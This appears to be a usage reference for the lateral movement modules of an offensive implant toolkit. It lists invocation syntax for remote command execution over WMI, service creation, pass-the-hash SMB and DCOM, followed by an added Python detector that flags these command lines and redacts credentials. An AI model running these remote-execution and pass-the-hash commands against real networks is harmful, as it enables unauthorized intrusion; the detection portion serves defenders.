Lateral Movement Modules
Executes a WMI method on the remote system.
[WheresMyImplant.Lateral]::WMIMethod("Target", "Username", "Password", "WMIClass", "WMIMethod", "Arguments", "Argument Delimiter")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,WMIMethod "Target","Username","Password","WMIClass","WMIMethod","Arguments","Argument Delimiter"
Executes a WMI query on the remote system.
[WheresMyImplant.Lateral]::WMIQuery("Target", "Username", "Password", "Query")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,WMIQuery "Target","Username","Password","Query"
Executes a command via Windows Service Creation. Uses passthrough authentication.
[WheresMyImplant.Lateral]::PSExecCommand("Target", "Execute", "ComSpec")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PSExecCommand "Target","Execute","ComSpec"
Lists the contents of a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientList("UNCPath", "Domain", "Username", "Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientList "UNCPath","Domain","Username","Hash"
Retrieves a file from a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientGet("UNCPathSource","DestinationPath","Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientGet "UNCPathSource","DestinationPath","Domain","Username","Hash"
Puts a file into a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientPut("SourcePath","UNCPathDestination","Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientPut "SourcePath","UNCPathDestination","Domain","Username","Hash"
Deletes a file from a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientDelete("UNCPathDestination","Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientDelete "UNCPathDestination","Domain","Username","Hash"
Executes a command through Windows Service Creation via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBExec("Target", "Command", "Domain", "Username", "Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBExec "Target","Command","Domain","Username","Hash"
Executes a command through WMI Win32_Process via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHWMIExec("Target", "Command", "Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHWMIExec "Target","Command","Domain","Username","Hash"
Executes a command through DCOM via Excel's DDE provider.
[WheresMyImplant.Lateral]::DComExcelDDE("Target", "Command", "Arguments")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComExcelDDE "Target","Command","Arguments"
Executes a command through DCOM via MMC.
[WheresMyImplant.Lateral]::DComMMC("Target", "Command", "Arguments", "IsVisible")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComMMC "Target","Command","Arguments","IsVisible"
Executes a command through DCOM via ShellWindows.
[WheresMyImplant.Lateral]::DComShellWindows("Target", "Command", "Arguments")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComShellWindows "Target","Command","Arguments"
Executes a command through DCOM via ShellBrowserWindow.
[WheresMyImplant.Lateral]::DComShellBrowserWindow("Target", "Command", "Arguments")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComShellBrowserWindow "Target","Command","Arguments"
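Detection note (added example, not code from the WheresMyImplant project): the rundotnetdll32.exe forms above share one command-line shape, so process-creation logs can be parsed for it. The sketch below names the technique family and redacts the password or hash argument before alerting; `analyze`, `MODULES` and the sample lines are constructed for illustration, and the argument positions follow the signatures listed on this page.

```python
import re

# Method -> (technique family, index of the password/hash argument or None),
# following the signatures listed on this page.
MODULES = {
    "WMIMethod": ("WMI", 2), "WMIQuery": ("WMI", 2), "PTHWMIExec": ("WMI", 4),
    "PSExecCommand": ("service creation", None), "PTHSMBExec": ("service creation", 4),
    "PTHSMBClientList": ("SMB file access", 3), "PTHSMBClientGet": ("SMB file access", 4),
    "PTHSMBClientPut": ("SMB file access", 4), "PTHSMBClientDelete": ("SMB file access", 3),
    "DComExcelDDE": ("DCOM", None), "DComMMC": ("DCOM", None),
    "DComShellWindows": ("DCOM", None), "DComShellBrowserWindow": ("DCOM", None),
}

# <assembly>.dll,<namespace>,<class>,<method> followed by the quoted argument list.
# The DLL path and namespace are matched loosely because a file can be renamed on disk.
INVOKE = re.compile(r'([^\s,"]+\.dll),(\w+),(\w+),(\w+)\s*(.*)$', re.IGNORECASE)
ARG = re.compile(r'"([^"]*)"')

def analyze(command_line):
    """Return an alert dict for a Lateral module invocation, else None."""
    m = INVOKE.search(command_line)
    if not m or m.group(3).lower() != "lateral" or m.group(4) not in MODULES:
        return None
    family, secret_idx = MODULES[m.group(4)]
    args = ARG.findall(m.group(5))
    if secret_idx is not None and secret_idx < len(args):
        args[secret_idx] = "<redacted>"  # keep credentials out of the alert
    return {"assembly": m.group(1), "method": m.group(4), "family": family,
            "args": args, "credential_on_cmdline": secret_idx is not None}

# Constructed process-creation command lines (not real telemetry).
SAMPLES = [
    'rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBExec "10.0.0.5","whoami","CORP","svc","CONSTRUCTED_HASH_VALUE"',
    'rundotnetdll32.exe C:\\Temp\\helper.dll,WheresMyImplant,Lateral,DComMMC "10.0.0.7","cmd.exe","/c dir","false"',
    'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line))
```

The PowerShell `[WheresMyImplant.Lateral]::` form does not produce this command line; catching it relies on PowerShell script block logging instead.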